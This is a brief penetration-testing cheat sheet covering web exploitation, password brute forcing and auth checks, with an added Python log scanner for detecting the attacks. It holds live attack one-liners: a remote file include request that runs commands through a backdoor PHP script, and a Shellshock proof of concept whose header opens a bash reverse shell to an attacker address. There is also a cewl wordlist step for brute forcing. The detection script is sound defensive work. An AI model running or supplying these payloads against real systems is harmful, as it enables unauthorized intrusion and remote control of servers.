Basic Penetration Testing

Exploitation

Last updated 4 years ago

WebShell

File Include

curl "http://target/?page=http://php/backdoor.php&cmd=id"

Shellshock POC

curl -H "user-agent: () { :; }; echo; /bin/bash -c 'bash -i >& /dev/tcp/$myip/445 0>&1'" http://$ip/cgi-bin/user.sh
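
How the two requests above look from the server side, as an added example that is not part of the original page: a Python scan of Apache combined-format access-log lines for a query parameter whose value is a URL and for a `() {` function definition in a logged header. The log lines, the `scan` function and the finding labels are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Shellshock marker: a header value containing a bash function definition "() {"
SHELLSHOCK = re.compile(r"\(\)\s*\{")
# Remote file include marker: a query parameter whose value is itself a URL
REMOTE_URL = re.compile(r"^(?:https?|ftp)://", re.I)
# Apache "combined" format: ip, request line, status, size, referer, user-agent
LINE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "(.*)"$'
)

# Constructed sample lines (not taken from a real server).
SAMPLE_LOG = r'''
192.0.2.10 - - [01/Jan/2021:10:00:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.66 - - [01/Jan/2021:10:00:05 +0000] "GET /?page=http://php/backdoor.php&cmd=id HTTP/1.1" 200 128 "-" "curl/7.68.0"
192.0.2.66 - - [01/Jan/2021:10:00:09 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 64 "-" "() { :; }; echo; /bin/id"
192.0.2.11 - - [01/Jan/2021:10:00:12 +0000] "GET /?page=%68ttp%3A%2F%2Fphp%2Fbackdoor.php HTTP/1.1" 200 128 "-" "Mozilla/5.0"
'''

def scan(log_text):
    """Return (client_ip, finding) tuples for suspicious requests, in log order."""
    findings = []
    for line in log_text.strip().splitlines():
        m = LINE.match(line)
        if not m:
            continue  # not a combined-format line
        ip, _method, target, _status, referer, agent = m.groups()
        # Only Referer and User-Agent are present in this log format.
        if SHELLSHOCK.search(referer) or SHELLSHOCK.search(agent):
            findings.append((ip, "shellshock-header"))
        # parse_qsl percent-decodes values, so encoded URLs are caught as well.
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            if REMOTE_URL.match(value.strip()):
                findings.append((ip, f"remote-include:{name}"))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The combined format records only the Referer and User-Agent headers, so a function definition sent in any other header is visible only if that header is logged too.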

Virtual hosting

Virtual hosting is a method for hosting multiple domain names (with separate handling of each name) on a single server (or pool of servers).

Brute Force Password

Create Passwd Dictionary

cewl -m 5 http://$ip/joomla/ > passwd.txt

Authentication

  1. Check cookies

  2. Check username variants: "admin" vs "Admin" (case), and "admin " (trailing space) vs "admin"

  3. Check the redirection

Authorization

  1. Check IDOR

  2. Check .js, .json

  3. Check Object-relational mapping (&admin[admin]=1)
